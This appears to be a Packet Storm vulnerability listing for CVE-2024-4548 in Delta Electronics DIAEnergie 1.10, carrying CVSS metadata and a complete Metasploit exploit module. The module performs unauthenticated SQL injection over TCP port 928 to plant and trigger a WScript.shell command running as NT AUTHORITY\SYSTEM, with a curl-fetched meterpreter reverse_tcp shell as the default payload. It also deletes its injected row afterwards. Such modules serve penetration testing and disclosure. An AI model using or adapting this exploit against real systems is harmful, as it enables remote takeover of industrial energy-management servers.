DIAEnergie 1.10 SQL Injection

2024-08-2200:00:00

Michael Heinzl, Tenable, metasploit.com

packetstormsecurity.com

sql injection

diaenergie

delta electronics

unauthenticated remote attack

arbitrary code execution

cebc service

nt authority\system

windows

tcp

metasploit

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.1

Confidence

Low

EPSS

0.003

Percentile

69.6%

JSON

`class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Msf::Exploit::Remote::Tcp  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'DIAEnergie SQL Injection (CVE-2024-4548)',  
'Description' => %q{  
SQL injection vulnerability in DIAEnergie <= v1.10 from Delta Electronics.  
This vulnerability can be exploited by an unauthenticated remote attacker to gain arbitrary code execution through a SQL injection vulnerability in the CEBC service. The commands will get executed in the context of NT AUTHORITY\SYSTEM.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'Michael Heinzl', # MSF exploit  
'Tenable' # Discovery & PoC  
],  
'References' => [  
[ 'URL', 'https://www.tenable.com/security/research/tra-2024-13'],  
[ 'CVE', '2024-4548']  
],  
'DisclosureDate' => '2024-05-06',  
'Platform' => 'win',  
'Arch' => [ ARCH_CMD ],  
'Targets' => [  
[  
'Windows_Fetch',  
{  
'Arch' => [ ARCH_CMD ],  
'Platform' => 'win',  
'DefaultOptions' => {  
'FETCH_COMMAND' => 'CURL',  
'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'  
},  
'Type' => :win_fetch  
}  
]  
],  
'DefaultTarget' => 0,  
  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options(  
[  
Opt::RPORT(928)  
]  
)  
end  
  
# Determine if the DIAEnergie version is vulnerable  
def check  
begin  
connect  
sock.put 'Who is it?'  
res = sock.get || ''  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
vprint_error(e.message)  
return Exploit::CheckCode::Unknown  
ensure  
disconnect  
end  
  
if res.empty?  
vprint_status('Received an empty response.')  
return Exploit::CheckCode::Unknown  
end  
  
vprint_status('Who is it response: ' + res.to_s)  
version_pattern = /\b\d+\.\d+\.\d+\.\d+\b/  
version = res.match(version_pattern)  
  
if version[0].nil?  
Exploit::CheckCode::Detected  
end  
  
vprint_status('Version retrieved: ' + version[0])  
  
unless Rex::Version.new(version) <= Rex::Version.new('1.10.1.8610')  
return CheckCode::Safe  
end  
  
return CheckCode::Appears  
end  
  
def exploit  
execute_command(payload.encoded)  
end  
  
def execute_command(cmd)  
scname = Rex::Text.rand_text_alphanumeric(5..10).to_s  
vprint_status('Using random script name: ' + scname)  
  
year = rand(2024..2026)  
month = sprintf('%02d', rand(1..12))  
day = sprintf('%02d', rand(1..29))  
random_date = "#{year}-#{month}-#{day}"  
vprint_status('Using random date: ' + random_date)  
  
hour = sprintf('%02d', rand(0..23))  
minute = sprintf('%02d', rand(0..59))  
second = sprintf('%02d', rand(0..59))  
random_time = "#{hour}:#{minute}:#{second}"  
vprint_status('Using random time: ' + random_time)  
  
# Inject payload  
begin  
print_status('Sending SQL injection...')  
connect  
vprint_status("RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--")  
sock.put "RecalculateHDMWYC~#{random_date} #{random_time}~#{random_date} #{random_time}~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'#{scname}', N'CreateObject(\"WScript.shell\").run(\"cmd /c #{cmd}\")', N'', N'');--"  
res = sock.get  
unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'  
fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)  
end  
  
vprint_status('Injection - Expected response received: ' + res.to_s)  
disconnect  
  
# Trigger  
print_status('Triggering script execution...')  
connect  
sock.put "RecalculateScript~#{random_date} #{random_time}~#{random_date} #{random_time}~1"  
res = sock.get  
unless res.to_s == 'Recalculate Script Start!'  
fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)  
end  
vprint_status('Trigger - Expected response received: ' + res.to_s)  
  
disconnect  
  
print_good('Script successfully injected, check thy shell.')  
ensure  
# Cleanup  
print_status('Cleaning up database...')  
connect  
sock.put "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='#{scname}';--"  
res = sock.get  
unless res.to_s == 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.'  
fail_with(Failure::UnexpectedReply, 'Unexpected reply from the server received: ' + res.to_s)  
end  
vprint_status('Cleanup - Expected response received: ' + res.to_s)  
  
disconnect  
end  
end  
end  
`